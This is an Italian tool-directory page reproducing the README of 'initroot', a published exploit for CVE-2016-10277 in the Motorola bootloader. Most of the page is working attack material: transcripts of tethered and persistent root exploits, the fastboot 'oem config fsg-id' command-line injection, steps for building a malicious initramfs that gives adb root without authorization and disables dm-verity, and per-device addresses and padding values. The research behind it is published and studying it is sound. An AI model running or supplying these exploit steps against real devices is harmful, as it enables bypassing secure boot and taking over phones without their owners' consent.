Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
initroot — Motorola Untethered Jailbreak: sfruttamento di CVE-2016-10277 per bypassare Secure Boot e il blocco del dispositivo | Kitploit
Strumenti/GitHubGitHub/alephsecurity/initroot
Sicurezza AndroidEscalation di PrivilegiMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitSicurezza MobileSviluppo PayloadBinary Exploitation
GitHubalephsecurity/initroot

initroot

Motorola Untethered Jailbreak: sfruttamento di CVE-2016-10277 per bypassare Secure Boot e il blocco del dispositivo

Vedi Repository
84248 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

initroot: Iniezione della riga di comando del kernel del bootloader Motorola, bypass del boot sicuro e del blocco del dispositivo (CVE-2016-10277)

Di Roee Hay / Aleph Research, HCL Technologies

Exploit di primo stadio: Jailbreak temporaneo

Questo exploit ottiene un accesso root illimitato effimero sul dispositivo. Ad esempio, su cedric (alcuni messaggi sono stati rimossi per leggibilità):

root@kitploit:~
$ cd ./tethered/cedric
$ ./initroot-tethered.sh
Welcome to initroot-cedric-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0xA2100000,1588596
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (34319 KB)...
OKAY [  1.098s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.101s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:shell:s0
$ adb shell
cedric:/ # 

Exploit di secondo stadio: Jailbreak persistente

Questo exploit ottiene un accesso root persistente sul dispositivo. Ad esempio, su athene (alcuni messaggi sono stati rimossi per leggibilità):

root@kitploit:~
$ cd ./untethered/athene
$ ./initroot-untethered.sh 
Welcome to initroot-athene-untethered
Welcome to initroot-athene-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x92000000,2505052
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (35214 KB)...
OKAY [  1.131s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.138s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
padC-initroot: 1 file pushed. 11.1 MB/s (22937600 bytes in 1.963s)
44800+0 records in
44800+0 records out
22937600 bytes transferred in 3.017 secs (7602784 bytes/sec)
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a rdinit= root=/dev/mmcblk0p41
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
rebooting...

finished. total time: 0.815s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # 

Produrre il proprio archivio initramfs malevolo

  1. Usa il initroot-<device>.cpio.gz incluso, o produci il tuo:
root@kitploit:~
$ cd <initramfs folder>
$ find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../initroot-<device>.cpio.gz
OR if padding is needed:
$ dd if=/dev/zero of=../pad ibs=1 count=<PAD_SIZE>
$ cp ../pad ../initroot-<device>.cpio.gz && find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../tmp && ls -la ../tmp && cat ../tmp >> ../initroot-<device>.cpio.gz  && rm -fr ../tmp
$ cd ..
  1. Le nostre immagini initramfs incluse hanno adb in esecuzione come root per impostazione predefinita. Non chiederà autorizzazione. Inoltre, dm-verity è disabilitato sulle partizioni pertinenti
root@kitploit:~
fastboot oem config fsg-id "a initrd=<SCRATCH_ADDR+PAD_SIZE>,<initroot.cpio.gz size-PAD_SIZE>"`
fastboot flash foo initroot-<device>.cpio.gz`
fastboot continue
  1. se usi il nostro initramfs, adb shell ora ti darà una shell root:
root@kitploit:~
$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0

Creare un exploit persistente per altri dispositivi Moto

Leggi il nostro post sul blog

Dispositivi verificati

Segnalati dalla comunità

Nota

Questa vulnerabilità potrebbe interessare anche altri dispositivi Motorola: sarà necessario un initramfs diverso. Un indirizzo fisico diverso di initrd (SCRATCH_ADDR). Anche PADDING potrebbe variare.

Video dimostrativo

Video dimostrativo di CVE-2016-10277

Pubblicazioni

  1. initroot: Bypass del boot sicuro di Nexus 6 tramite iniezione della riga di comando del kernel
  2. initroot: Ciao Moto
  3. Iniezione della riga di comando del kernel del bootloader Android Motorola, bypass del boot sicuro
  4. initroot persistente (USENIX WOOT '17)
  5. Articolo USENIX WOOT '17
Scarica lo strumento
DeviceCodenameSCRATCH_ADDRPADDINGinitramfs inclusoPartizione inutilizzata
Nexus 6shamu0x110000000x0AOSP userdebugmmcblk0p11
Moto G5 (XT1676)cedric0xA01000000x2000000Release, init e adbd patchati per disabilitare SELinux, set{u,g}id a shell, drop delle capabilities e autenticazione adb, eccmmcblk0p41
Moto G4 (XT1622)athene0x900000000x2000000""mmcblk0p48
DeviceCodenameSCRATCH_ADDRSegnalatoreDescrizione
Moto G5 Pluspotter0xA0100000drbeatProprietà di avvio iniettata. [prova]
Moto G4 Play (XT1607)harpia0x90000000m-mullinsSfruttamento completo di Amazon XT1607. [prova]
Moto G4 Play (XT1609)harpia0x90000000@utoprimeSfruttamento completo di Verizon XT1609. [prova]
Moto G4 (XT1625)athene0x90000000@EWorcelinitrd iniettato che ha causato boot loop. [prova]
Moto G3osprey0x90000000@asiekierkainitrd iniettato che ha causato boot loop. [prova]
Moto G2 (XT1072)thea0x11000000@TheElixinitrd iniettato che ha causato boot loop. [prova]
Moto G (XT1032)falcon_retfr0x11000000Pierre ZurekSfruttamento completo con padding di 64 MB [prova]
Moto E (XT830C)condor_cdma0x0E000000fetcherSfruttamento completo di XT830C bloccato su Tracfone/Verizon con padding di 32 MB [prova]
Altro--@jcase[prova]